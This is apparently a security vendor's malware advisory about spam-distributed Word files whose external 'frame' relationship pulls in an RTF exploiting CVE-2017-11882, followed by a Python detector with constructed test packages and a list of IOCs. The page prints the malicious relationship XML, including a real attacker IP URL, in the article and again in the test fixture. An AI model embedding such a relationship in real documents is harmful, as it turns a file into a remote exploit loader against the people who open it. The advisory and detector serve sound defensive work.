Distribution of malware that exploits the RTF vulnerability CVE-2017-11882 through an external connection embedded in an MS Office Word document has been found. Employees must stay alert, as the attacker is using spam e-mails to distribute the malware to domestic shopping malls and other businesses.

Recently, the distribution of MS Office Word malware that uses an external connection has been increasing sharply. Because the attacker uses a normal XML Relationship of the OOXML (Office Open XML) format and only the target address points to a malicious URL, it is difficult to tell whether the file is malicious from the file binary alone. The following is the relationship entry, with the malicious URL, that has been inserted into the document file. When the document is opened, Word automatically attempts to connect to that URL.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
Target="http://23.95.122.25/..-.-................-.....-------------/........................................................................dot" TargetMode="External"/></Relationships>

Once the connection succeeds, an RTF file that exploits the vulnerability is loaded into the currently opened document. The vulnerability is CVE-2017-11882, the Microsoft Equation Editor memory corruption flaw, which has been used in the past. When looked up in VirusTotal, the result shows that various anti-malware products, including AhnLab V3, already detect it.
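The two stages described above, the external relationship in the Word package and the RTF payload it pulls in, can both be triaged offline without opening the file in Word. The following is an added example written for this page; it is not AhnLab's V3 detection logic and does not use any real sample. It builds two minimal .docx packages in memory (constructed inputs), one carrying the frame relationship shown on the page and one benign document with an ordinary hyperlink, then lists every relationship with TargetMode="External" and flags those whose type Word resolves automatically on open. The list of auto-resolved relationship types and the Equation Editor marker check for RTF are this example's own assumptions, stated as such in the comments.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Relationship types that Word resolves on open rather than on click. Assumption of this
# example: a reviewer's short list, not the rule set behind the detection aliases on the page.
AUTOLOAD_TYPES = {"frame", "oleObject", "attachedTemplate", "subDocument", "image"}
REMOTE_TARGET = re.compile(r"^(https?|ftp|file)://|^\\\\", re.I)


def external_relationships(docx_bytes: bytes) -> list:
    """Walk every .rels part in an OOXML package and list relationships with TargetMode="External".

    The package is never opened in Word, so nothing is fetched; this only inspects the
    relationship XML and reports which targets would be resolved automatically.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel_type,
                    "target": target,
                    "remote": bool(REMOTE_TARGET.match(target)),
                    "autoload": rel_type in AUTOLOAD_TYPES,
                })
    return findings


def is_suspicious(findings: list) -> bool:
    """A remote target on an auto-resolved relationship is the pattern described on the page.
    A plain hyperlink to a web site is External too, but it is only followed on a user click."""
    return any(f["remote"] and f["autoload"] for f in findings)


def rtf_embeds_equation_object(data: bytes) -> bool:
    """Coarse indicator for the second stage: an RTF carrying an Equation Editor 3.0 object,
    the component CVE-2017-11882 lives in. Looks for \\objclass Equation.3 or the class name
    hex-encoded inside \\objdata. Assumption: a triage heuristic, not a full detector; real
    samples frequently obfuscate both markers."""
    if not data.lstrip().lower().startswith(b"{\\rtf"):
        return False
    if re.search(rb"\\objclass\s*Equation\.[23]", data, re.I):
        return True
    return b"4571756174696f6e2e33" in data.lower()   # "Equation.3" as ASCII hex


# ---- constructed test inputs (not real samples) ----------------------------------------
CONTENT_TYPES = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                 '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                 '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
                 '<Default Extension="xml" ContentType="application/xml"/>'
                 '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
                 '</Types>')
ROOT_RELS = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
             'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
             'Target="word/document.xml"/></Relationships>')
DOCUMENT_XML = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                '<w:body><w:p/></w:body></w:document>')

# The relationship part from the page: a frame relationship whose external target is the attacker URL.
MALICIOUS_RELS = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                  'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" '
                  'Target="http://23.95.122.25/..-.-................-.....-------------/'
                  '........................................................................dot" '
                  'TargetMode="External"/></Relationships>')

# A benign document: an internal styles part plus a click-to-follow hyperlink.
BENIGN_RELS = (f'<Relationships xmlns="{REL_NS}">'
               '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
               '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ahnlab.com/" TargetMode="External"/>'
               '</Relationships>')

# Constructed RTF fragments: one with an Equation.3 object, one with an ordinary Package object.
RTF_EQUATION = b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata 0105000002000000}}}"
RTF_PLAIN = b"{\\rtf1{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata 0105000002000000}}}"


def build_docx(document_rels: str) -> bytes:
    """Assemble a minimal .docx in memory around the given document.xml.rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        found = external_relationships(build_docx(rels))
        print(label, "suspicious" if is_suspicious(found) else "clean", found)
    print("rtf equation object:", rtf_embeds_equation_object(RTF_EQUATION))
```

The benign package is the important control: External-mode relationships are normal for hyperlinks, so a rule that alerts on TargetMode="External" alone will drown in false positives. The distinguishing feature of the attack on this page is an auto-resolved type (here frame) combined with a remote target, which is what is_suspicious keys on. The RTF check is only a first triage step for whatever the URL returns; a dropped payload should still go to a sandbox or an RTF object parser.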

Even if the MS Office Word document itself is not detected as malicious, V3 can still detect and block the attack in real time at the execution phase, once the RTF binary has been loaded, and prevent any damage.
In addition to blocking at the execution phase in real time, AhnLab detects the related files under the aliases below.
[File Detection]
Downloader/XML.External
Downloader/DOC.External
Downloader/XML.External.S1461
RTF/Malform-A.Gen
[IOC]
3fdc2e4e52b6499def0ff7411a7e0060
506e20689941bee2677c7214bc2083f2
e70135cdb555ce99adee7df642813dcb
hxxp://23.95.122.25/..-.-................-.....-------------/........................................................................dot
hxxp://23.95.122.25/..-.-…………….-…..————-/………………………………………………………………dot
Categories: Malware Information